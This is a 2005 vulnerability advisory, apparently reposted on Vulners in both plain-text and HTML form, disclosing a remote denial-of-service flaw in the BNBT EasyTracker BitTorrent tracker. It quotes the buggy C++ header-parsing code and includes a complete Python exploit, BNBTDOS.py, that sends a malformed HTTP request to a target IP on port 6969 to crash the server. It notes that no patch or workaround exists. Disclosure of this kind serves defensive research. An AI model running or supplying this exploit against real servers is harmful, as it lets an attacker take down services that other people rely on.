Vulners
Lucene search
AD20050830.txt
`------=_Part_1314_25115579.1125371502728
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
BNBT EasyTracker Remote Denial of Service Vulnerability
by Sowhat
Last Update:2005.08.30
http://secway.org/advisory/AD20050830.txt
Vendor:
http://bnbteasytracker.sourceforge.net/
Product Affected:
7.7r3.2004.10.27 and below
Overview:
BNBT was written by Trevor Hogan. BNBT is a complete port=20
of the original Python BitTorrent tracker to C++ for speed
and efficiency. BNBT also offers many additional features
beyond the original Python BitTorrent tracker, plus it's=20
easy to use and customizable. BNBT is covered under the GNU
Lesser General Public License (LGPL).
A Denial of Service vulnerability exists within BNBT which
allows for an attacker to cause the BNBT to stop responding.=20
Details:
A specifically crafted HTTP request will cause the BNBT=20
Server stop responding.
Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
will reproduce the problem. It seems that the bug is located
in client.cpp, "//grab headers" section. And it is something
like " 1-2 =3D -1" and similar to memcpy(-1) ?=20
// grab headers
string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine =3D m_strReceiveBuf.find( "\r\n\r\n" );
strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),=20
iDoubleNewLine - iNewLine - strlen( "\r\n" ) );
while( 1 )
{
string :: size_type iSplit =3D strTemp.find( ":" );
string :: size_type iEnd =3D strTemp.find( "\r\n" );
if( iSplit =3D=3D string :: npos )
{
UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );
break;
}
string strKey =3D strTemp.substr( 0, iSplit );
string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit =
-=20
strlen( "\r\n" ) );//Bug here ??
rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );
strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" ) );
if( iEnd =3D=3D string :: npos )
break;
}
However, I am not quite sure about that and it seems that
it is only a D.O.S so I havnt deep into it.=20
=20
Exploit:
//BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discoverd and coded by Sowhat
# http://secway.org
# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/
import sys
import string
import socket
if (len(sys.argv) !=3D 2):
print "\nUsage: " + sys.argv[0] + " TargetIP\n"
print "##################################################################"
print "# #"
print "# BNBT EasyTracker Remote D.O.S Exploit #"
print "# Bug discoverd and coded by Sowhat #"
print "# http://secway.org #"
print "##################################################################"
sys.exit(0)
host =3D sys.argv[1]
port =3D 6969
payload =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.send(payload)
WORKAROUND:
No WORKAROUND this time.
plz check the vendor's website for update
Maybe there will be a patch later (?)
Vendor Response:
2005.08.22 Vendor notified via Webform,no email found=20
2005.08.30 Vendor no response. Advisory Released
"Life is like a bug, Do you know how to exploit it ?"
------=_Part_1314_25115579.1125371502728
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
<p>BNBT EasyTracker Remote Denial of Service Vulnerability</p>
<p>by Sowhat</p>
<p>Last Update:2005.08.30</p>
<p><a href=3D"http://secway.org/advisory/AD20050830.txt">http://secway.org/=
advisory/AD20050830.txt</a></p>
<p>Vendor:</p>
<p><a href=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytrack=
er.sourceforge.net/</a></p>
<p>Product Affected:</p>
<p>7.7r3.2004.10.27 and below</p>
<p>Overview:</p>
<p>BNBT was written by Trevor Hogan. BNBT is a complete port <br>of the ori=
ginal Python BitTorrent tracker to C++ for speed<br>and efficiency. BNBT al=
so offers many additional features<br>beyond the original Python BitTorrent=
tracker, plus it's=20
<br>easy to use and customizable. BNBT is covered under the GNU<br> Le=
sser General Public License (LGPL).</p>
<p>A Denial of Service vulnerability exists within BNBT which<br>allows for=
an attacker to cause the BNBT to stop responding. </p>
<p>Details:</p>
<p>A specifically crafted HTTP request will cause the BNBT <br>Server stop =
responding.</p>
<p>Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"<=
br>will reproduce the problem. It seems that the bug is located<br>in clien=
t.cpp, "//grab headers" section. And it is something<br>like &quo=
t; 1-2 =3D -1" and similar to memcpy(-1) ?=20
</p>
<p>// grab headers</p>
<p> string :: size_type iNewLine =3D m_strReceiveBuf.find( "\r\n&=
quot; );<br> string :: size_type iDoubleNewLine =3D m_strReceiveBuf.fi=
nd( "\r\n\r\n" );</p>
<p> strTemp =3D m_strReceiveBuf.substr( iNewLine + strlen( "\r\n&=
quot; ), iDoubleNewLine - iNewLine - strlen( "\r\n" ) );</p>
<p> while( 1 )<br> {<br> string :: size_type iSplit =
=3D strTemp.find( ":" );<br> string :: size_type iEnd =
=3D strTemp.find( "\r\n" );</p>
<p> if( iSplit =3D=3D string :: npos )<br> {<br> =
; UTIL_LogPrint( "client warning - malformed HTTP request (=
bad header)\n" );</p>
<p> break;<br> }</p>
<p> string strKey =3D strTemp.substr( 0, iSplit );<br> &nbs=
p;string strValue =3D strTemp.substr( iSplit + strlen( ": " ), iE=
nd - iSplit - strlen( "\r\n" ) );//Bug here ??</p>
<p> rqst.mapHeaders.insert( pair<string, string>( strKey, =
strValue ) );</p>
<p> strTemp =3D strTemp.substr( iEnd + strlen( "\r\n" =
) );</p>
<p> if( iEnd =3D=3D string :: npos )<br> break;=
<br> }</p>
<p>However, I am not quite sure about that and it seems that<br>it is only =
a D.O.S so I havnt deep into it. <br> </p>
<p>Exploit:</p>
<p>//BNBTDOS.py<br># BNBT EasyTracker Remote D.O.S Exploit<br># Bug discove=
rd and coded by Sowhat<br># <a href=3D"http://secway.org/">http://secway.or=
g</a></p>
<p># Version 7.7r3.2004.10.27 and below<br># the BNBT project: <a hre=
f=3D"http://bnbteasytracker.sourceforge.net/">http://bnbteasytracker.source=
forge.net/</a><br> <br>import sys<br>import string<br>import socket</p=
>
<p>if (len(sys.argv) !=3D 2):<br> print "\nUsage: " + sys.ar=
gv[0] + " TargetIP\n"<br> print "######################=
############################################"<br> print "#&n=
bsp;  =
; &n=
bsp;  =
; &n=
bsp;  =
; #"
<br> print "# &nbs=
p; BNBT EasyTracker Remote D.O.S Exploit  =
; #"<br>&n=
bsp;print "# &nbs=
p; Bug discoverd and coded by Sowhat &nb=
sp; =
#"<br> print "# &n=
bsp; <a href=3D"http://secway.org/">
http://secway.org</a> =
&nb=
sp; #"<br>=
print "#########################################################=
#########"<br> sys.exit(0)</p>
<p>host =3D sys.argv[1]<br>port =3D 6969</p>
<p><br>payload =3D "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"</=
p>
<p>s =3D socket.socket(socket.AF_INET,socket.SOCK_STREAM)<br>s.connect((hos=
t,port))<br>s.send(payload)</p>
<p><br>WORKAROUND:</p>
<p>No WORKAROUND this time.<br>plz check the vendor's website for update<br=
>Maybe there will be a patch later (?)</p>
<p>Vendor Response:</p>
<p>2005.08.22 Vendor notified via Webform,no email found <br>2005.08.30 Ven=
dor no response. Advisory Released</p>
<p>"Life is like a bug, Do you know how to exploit it ?"</p>
<p><br> </p>
------=_Part_1314_25115579.1125371502728--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4